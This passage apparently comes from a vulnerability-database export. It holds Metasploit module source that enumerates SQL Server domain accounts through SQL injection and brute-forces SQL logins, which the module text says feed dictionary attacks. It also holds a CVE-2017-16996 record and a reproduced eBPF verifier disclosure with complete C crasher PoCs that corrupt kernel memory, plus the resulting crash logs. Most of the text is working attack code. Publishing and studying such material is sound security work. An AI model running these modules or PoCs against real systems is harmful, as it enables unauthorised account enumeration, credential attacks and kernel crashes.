#{windows_domain_sid}\")\n end\n\n # Get a list of windows users, groups, and computer accounts using SUSER_NAME()\n total_rids = datastore['END_RID'] - datastore['START_RID']\n print_status(\"Brute forcing #{total_rids} RIDs via SQL injection, be patient...\")\n domain_users = get_win_domain_users(windows_domain_sid)\n if domain_users.nil?\n print_error(\"Sorry, no Windows domain accounts were found, or DC could not be contacted.\")\n return\n end\n\n # Print number of objects found and write to a file\n print_good(\"#{domain_users.length} user accounts, groups, and computer accounts were found.\")\n\n # Create table for report\n windows_domain_login_table = Rex::Text::Table.new(\n 'Header' => 'Windows Domain Accounts',\n 'Ident' => 1,\n 'Columns' => ['name']\n )\n\n # Add brute forced names to table\n domain_users.each do |object_name|\n windows_domain_login_table << [object_name]\n end\n\n print_line(windows_domain_login_table.to_s)\n\n # Create output file\n filename= \"#{datastore['RHOST']}-#{datastore['RPORT']}_windows_domain_accounts.csv\"\n path = store_loot(\n 'mssql.domain.accounts',\n 'text/plain',\n datastore['RHOST'],\n windows_domain_login_table.to_csv,\n filename,\n 'SQL Server query results'\n )\n print_status(\"Query results have been saved to: #{path}\")\n end\n\n # Get the server name\n def get_server_name\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+@@servername+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n instance_name = $1\n sql_server_name = instance_name.split('\\\\')[0]\n else\n sql_server_name = nil\n end\n\n sql_server_name\n end\n\n # Get the domain name of the SQL Server\n def get_domain_name\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n domain_name = $1\n else\n domain_name = nil\n end\n\n domain_name\n end\n\n # Get the SID for the domain\n def get_windows_domain_sid(db_domain_name)\n domain_group = \"#{db_domain_name}\\\\Domain Admins\"\n\n clue_start = Rex::Text.rand_text_alpha(8)\n clue_end = Rex::Text.rand_text_alpha(8)\n\n sql = \"(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n object_sid = $1\n domain_sid = object_sid[0..47]\n return nil if domain_sid.empty?\n else\n domain_sid = nil\n end\n\n domain_sid\n end\n\n # Get list of windows accounts, groups and computer accounts\n def get_win_domain_users(domain_sid)\n clue_start = Rex::Text.rand_text_alpha(8)\n clue_end = Rex::Text.rand_text_alpha(8)\n\n windows_logins = []\n\n total_rids = datastore['END_RID'] - datastore['START_RID']\n # Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function\n (datastore['START_RID']..datastore['END_RID']).each do |principal_id|\n rid_diff = principal_id - datastore['START_RID']\n if principal_id % 100 == 0\n print_status(\"#{rid_diff} of #{total_rids } RID queries complete\")\n end\n\n user_sid = build_user_sid(domain_sid, principal_id)\n\n # Return if sid does not resolve correctly for a domain\n if user_sid.length < 48\n return nil\n end\n\n sql = \"(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{user_sid}) as name)+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n windows_login = $1\n\n unless windows_login.empty? || windows_logins.include?(windows_login)\n windows_logins.push(windows_login)\n print_good(\" #{windows_login}\")\n end\n end\n\n end\n\n windows_logins\n end\n\n def build_user_sid(domain_sid, rid)\n # Convert number to hex and fix order\n principal_id = \"%02X\" % rid\n principal_id = principal_id.size.even? ? principal_id : \"0#{principal_id}\"\n principal_id = principal_id.scan(/(..)/).reverse.join\n # Add padding\n principal_id = principal_id.ljust(8, '0')\n\n # Create full sid\n \"0x#{domain_sid}#{principal_id}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb"}, {"lastseen": "2019-11-29T22:09:50", "bulletinFamily": "exploit", "description": "This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-10T19:42:52", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_SQL_LOGINS", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration',\n 'Description' => %q{\n This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.\n },\n 'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],\n 'License' => MSF_LICENSE,\n 'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]\n ))\n\n register_options(\n [\n OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 300]),\n ])\n end\n\n def run\n # Check connection and issue initial query\n print_status(\"Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...\")\n if mssql_login_datastore\n print_good('Connected.')\n else\n print_error('Login was unsuccessful. Check your credentials.')\n disconnect\n return\n end\n\n # Query for sysadmin status\n print_status(\"Checking if #{datastore['USERNAME']} has the sysadmin role...\")\n user_status = check_sysadmin\n\n # Check if user has sysadmin role\n if user_status == 1\n print_good(\"#{datastore['USERNAME']} is a sysadmin.\")\n else\n print_status(\"#{datastore['USERNAME']} is NOT a sysadmin.\")\n end\n\n # Get a list if sql server logins using SUSER_NAME()\n print_status(\"Setup to fuzz #{datastore['FuzzNum']} SQL Server logins.\")\n print_status('Enumerating logins...')\n sql_logins_list = get_sql_logins\n if sql_logins_list.nil? || sql_logins_list.empty?\n print_error('Sorry, somethings went wrong - SQL Server logins were found.')\n disconnect\n return\n else\n # Print number of initial logins found\n print_good(\"#{sql_logins_list.length} initial SQL Server logins were found.\")\n\n sql_logins_list.sort.each do |sql_login|\n if datastore['VERBOSE']\n print_status(\" - #{sql_login}\")\n end\n end\n end\n\n # Verify the enumerated SQL Logins using sp_defaultdb error ananlysis\n print_status('Verifying the SQL Server logins...')\n sql_logins_list_verified = verify_logins(sql_logins_list)\n if sql_logins_list_verified.nil?\n print_error('Sorry, no SQL Server logins could be verified.')\n disconnect\n return\n else\n\n # Display list verified SQL Server logins\n print_good(\"#{sql_logins_list_verified.length} SQL Server logins were verified:\")\n sql_logins_list_verified.sort.each do |sql_login|\n print_status(\" - #{sql_login}\")\n end\n end\n\n disconnect\n end\n\n # Checks if user is a sysadmin\n def check_sysadmin\n # Setup query to check for sysadmin\n sql = \"select is_srvrolemember('sysadmin') as IsSysAdmin\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse query results\n parse_results = result[:rows]\n status = parse_results[0][0]\n\n # Return status\n return status\n end\n\n # Gets trusted databases owned by sysadmins\n def get_sql_logins\n # Create array to store the sql logins\n sql_logins = []\n\n # Fuzz the principal_id parameter passed to the SUSER_NAME function\n (1..datastore['FuzzNum']).each do |principal_id|\n # Setup query\n sql = \"SELECT SUSER_NAME(#{principal_id}) as login\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:rows]\n sql_login = parse_results[0][0]\n\n # Add to sql server login list\n sql_logins.push(sql_login) unless sql_logins.include?(sql_login)\n end\n\n # Return list of logins\n sql_logins\n end\n\n # Checks if user has the db_owner role\n def verify_logins(sql_logins_list)\n\n # Create array for later use\n verified_sql_logins = []\n\n fake_db_name = Rex::Text.rand_text_alpha_upper(24)\n\n # Check if the user has the db_owner role is any databases\n sql_logins_list.each do |sql_login|\n # Setup query\n sql = \"EXEC sp_defaultdb '#{sql_login}', '#{fake_db_name}'\"\n\n # Execute query\n result = mssql_query(sql)\n\n # Parse results\n parse_results = result[:errors]\n result = parse_results[0]\n\n # Check if sid resolved to a sql login\n if result.include?(fake_db_name)\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n\n # Check if sid resolved to a sql login\n if result.include?('alter the login')\n # Add sql server login to verified list\n verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)\n end\n end\n\n verified_sql_logins\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb"}], "cve": [{"lastseen": "2019-05-29T18:16:55", "bulletinFamily": "NVD", "description": "kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.", "modified": "2018-01-09T17:48:00", "id": "CVE-2017-16996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16996", "published": "2017-12-27T17:08:00", "title": "CVE-2017-16996", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-01T13:00:47", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-12-22T00:00:00", "published": "2017-12-22T00:00:00", "href": "https://0day.today/exploit/description/29285", "id": "1337DAY-ID-29285", "type": "zdt", "title": "Linux Kernel >= 4.9 eBPF memory corruption bugs Vulnerability", "sourceData": "Hi!\r\n\r\nA few BPF verifier bugs in the Linux kernel, most of which can be used\r\nfor controlled memory corruption, have been fixed over the last days.\r\nOne of the bugs was introduced in 4.9, the others were only introduced\r\nin 4.14.\r\n\r\nThe fixes are in the net tree of the Linux kernel\r\n(https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/log/kernel/bpf),\r\nbut not in Linus' tree yet.\r\n\r\nThe following bug was introduced in 4.9:\r\n\r\n=== fixed by \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\ncheck_alu_op() did not distinguish between\r\nBPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)\r\nand BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);\r\nit performed sign extension in both cases.\r\nDebian assigned CVE-2017-16995 for this issue.\r\n\r\n\r\nThe following bugs were introduced in 4.14:\r\n\r\n=== fixed by \"bpf/verifier: fix bounds calculation on BPF_RSH\" ===\r\nIncorrect signed bounds were being computed for BPF_RSH.\r\nIf the old upper signed bound was positive and the old lower signed bound was\r\nnegative, this could cause the new upper signed bound to be too low,\r\nleading to security issues.\r\n\r\n=== fixed by \"bpf: fix incorrect tracking of register size truncation\" ===\r\nThe BPF verifier did not properly handle register truncation to a smaller size.\r\n\r\nThe old code first mirrors the clearing of the high 32 bits in the bitwise\r\ntristate representation, which is correct. But then, it computes the new\r\narithmetic bounds as the intersection between the old arithmetic bounds and\r\nthe bounds resulting from the bitwise tristate representation. Therefore,\r\nwhen coerce_reg_to_32() is called on a number with bounds\r\n[0xffff'fff8, 0x1'0000'0007], the verifier computes\r\n[0xffff'fff8, 0xffff'ffff] as bounds of the truncated number.\r\nThis is incorrect: The truncated number could also be in the range [0, 7],\r\nand no meaningful arithmetic bounds can be computed in that case apart from\r\nthe obvious [0, 0xffff'ffff].\r\nDebian assigned CVE-2017-16996 for this issue.\r\n\r\n=== fixed by \"bpf: fix 32-bit ALU op verification\" ===\r\nadjust_scalar_min_max_vals() only truncates its inputs and otherwise operates on\r\n64-bit numbers while the BPF interpreter and JIT perform 32-bit arithmetic.\r\nThis means that the output of e.g. `(u32)0x40000000*(u32)5` will be incorrect.\r\nTo test this, you can use the following BPF code:\r\n\r\n BPF_MOV32_IMM(BPF_REG_1, 0x40000000),\r\n BPF_ALU32_IMM(BPF_MUL, BPF_REG_1, 5),\r\n BPF_EXIT_INSN()\r\n\r\nThe verifier generates the following output, which is incorrect:\r\n\r\n 0: R1=ctx(id=0,off=0,imm=0) R10=fp0\r\n 0: (b4) (u32) r1 = (u32) 1073741824\r\n 1: R1=inv1073741824 R10=fp0\r\n 1: (24) (u32) r1 *= (u32) 5\r\n 2: R1=inv5368709120 R10=fp0\r\n 2: (95) exit\r\n R0 !read_ok\r\n\r\n=== fixed by \"bpf: fix missing error return in check_stack_boundary()\" ===\r\ncheck_stack_boundary() prints an error into the verifier log, but doesn't\r\nexit, when a stack pointer doesn't have a known offset. This should be\r\nusable to get read+write access to spilled stack pointers.\r\n\r\n=== fixed by \"bpf: force strict alignment checks for stack pointers\" ===\r\nThe verifier did not force strict alignment checks for stack pointers, but\r\nthe tracking of stack spills relies on it; unaligned stack accesses can\r\nlead to corruption of spilled registers, which is exploitable.\r\n\r\n=== fixed by \"bpf: don't prune branches when a scalar is replaced with\r\na pointer\" ===\r\nThe BPF verifier pruned branches when a scalar is replaced with\r\na pointer, explicitly permitting confusing a pointer into a number\r\n(but not the other way around). This is a kernel pointer leak.\r\n\r\n=== fixed by \"bpf: fix integer overflows\" ===\r\nThere were various issues related to the limited size of integers used in\r\nthe verifier:\r\n - `off + size` overflow in __check_map_access()\r\n - `off + reg->off` overflow in check_mem_access()\r\n - `off + reg->var_off.value` overflow or 32-bit truncation of\r\n `reg->var_off.value` in check_mem_access()\r\n - 32-bit truncation in check_stack_boundary()\r\n\r\n\r\n\r\nCrash PoCs for some of these issues are at\r\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454,\r\nbut since oss-security prefers having PoCs in the mail directly, I've\r\npasted the PoCs below.\r\nFor the other issues, examples of how to trigger them are in the\r\nadded BPF selftests.\r\nThe rest of the mail is just PoC code, so if you're not interested\r\nin the PoCs, you can stop reading now.\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\nHere is a crasher that tries to write to a noncanonical address.\r\nNote that it is only designed to work on 4.14.\r\n\r\n======================================\r\n[email\u00a0protected]:~/bpf_range$ cat crasher_badimm.c\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r0 with pointer to map value\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff\r\n BPF_MOV32_IMM(BPF_REG_1, 0xffffffff),\r\n // r1 = 0x1'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),\r\n // r1 = 0x1000'0000'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 28),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badimm crasher_badimm.c -Wall\r\n&& ./crasher_badimm\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere is the resulting crash (note the corrupted heap address in R15):\r\n\r\n======================================\r\n[10599.403881] general protection fault: 0000 [#6] SMP KASAN\r\n[10599.403886] Modules linked in: binfmt_misc snd_hda_codec_generic\r\ncrct10dif_pclmul crc32_pclmul ghash_clmulni_intel snd_hda_intel\r\nsnd_hda_codec pcbc snd_hda_core qxl snd_hwdep snd_pcm snd_timer ttm\r\naesni_intel snd ppdev aes_x86_64 drm_kms_helper parport_pc crypto_simd\r\nsoundcore glue_helper drm parport evdev cryptd sg serio_raw pcspkr\r\nvirtio_console virtio_balloon button ip_tables x_tables autofs4 ext4\r\ncrc16 mbcache jbd2 fscrypto sr_mod cdrom sd_mod ata_generic 8139too\r\nehci_pci ata_piix uhci_hcd libata ehci_hcd 8139cp crc32c_intel mii\r\nvirtio_pci psmouse usbcore virtio_ring scsi_mod virtio i2c_piix4\r\nfloppy\r\n[10599.403952] CPU: 7 PID: 1610 Comm: crasher_badimm Tainted: G B D\r\n 4.15.0-rc1+ #4\r\n[10599.403954] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[10599.403957] task: 000000004ae6ce3e task.stack: 000000006149ccc2\r\n[10599.403963] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[10599.403966] RSP: 0018:ffff8801ef6bf838 EFLAGS: 00010292\r\n[10599.403969] RAX: 0000000000000000 RBX: ffffc900016150b8 RCX: ffffffff866483d7\r\n[10599.403971] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac393b78\r\n[10599.403974] RBP: ffff8801ef6bf968 R08: 0000000000000000 R09: 0000000000000000\r\n[10599.403976] R10: 0000000000000001 R11: ffffed00358726b9 R12: ffffffff870be980\r\n[10599.403978] R13: 1ffff1003ded7f0e R14: 00000000deadbeef R15: 0fff8801ac393b78\r\n[10599.403981] FS: 00007fd705b43700(0000) GS:ffff8801f77c0000(0000)\r\nknlGS:0000000000000000\r\n[10599.403984] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[10599.403986] CR2: 0000561c31a24008 CR3: 00000001b153b002 CR4: 00000000001606e0\r\n[10599.403991] Call Trace:\r\n[10599.403997] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404000] ? bpf_jit_compile+0x30/0x30\r\n[10599.404006] ? alloc_skb_with_frags+0x90/0x2c0\r\n[10599.404010] ? __bpf_prog_run32+0x83/0xc0\r\n[10599.404013] ? __bpf_prog_run64+0xc0/0xc0\r\n[10599.404017] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404022] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[10599.404028] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[10599.404033] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404036] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404040] ? sock_alloc_inode+0x46/0x110\r\n[10599.404043] ? unix_stream_connect+0x840/0x840\r\n[10599.404046] ? __sock_create+0x7f/0x2c0\r\n[10599.404049] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404054] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[10599.404059] ? __wake_up_common_lock+0xaf/0x130\r\n[10599.404065] ? unix_stream_connect+0x840/0x840\r\n[10599.404068] ? sock_sendmsg+0x6b/0x80\r\n[10599.404071] ? sock_write_iter+0x11d/0x1d0\r\n[10599.404075] ? sock_sendmsg+0x80/0x80\r\n[10599.404080] ? do_raw_spin_unlock+0x86/0x120\r\n[10599.404084] ? iov_iter_init+0x77/0xb0\r\n[10599.404089] ? __vfs_write+0x23e/0x340\r\n[10599.404092] ? kernel_read+0xa0/0xa0\r\n[10599.404098] ? __fd_install+0x5/0x160\r\n[10599.404102] ? __fget_light+0x9b/0xb0\r\n[10599.404107] ? vfs_write+0xe9/0x240\r\n[10599.404110] ? SyS_write+0xa7/0x130\r\n[10599.404121] ? SyS_read+0x130/0x130\r\n[10599.404125] ? lockdep_sys_exit+0x16/0x8e\r\n[10599.404129] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[10599.404133] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404138] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[10599.404200] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801ef6bf838\r\n[10599.404204] ---[ end trace e8c17e9abe81bd46 ]---\r\n======================================\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect tracking of register size truncation\" ===\r\nHere is a crasher that uses this to again write to a noncanonical address:\r\n\r\n\r\n======================================\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define 